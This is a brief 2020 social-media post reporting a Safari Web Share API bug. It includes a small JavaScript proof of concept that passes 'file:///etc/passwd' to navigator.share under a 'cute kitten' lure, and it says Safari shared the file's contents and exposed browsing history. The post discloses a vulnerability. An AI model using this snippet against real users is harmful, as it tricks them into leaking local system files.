2020-08-25 UTC
# Wow, this Web Share API bug ⤵️ is concerning. const pwn = () =>
{ navigator.share({ text: 'Check out this cute kitten!', url: 'file:///etc/passwd', }); }
; Turns out Safari actually shares the _contents_ of /etc/passwords, and allows for stealing the history, too. https://twitter.com/firt/status/1298338366065451008 ( twitter.com/_/status/1298371563767701505)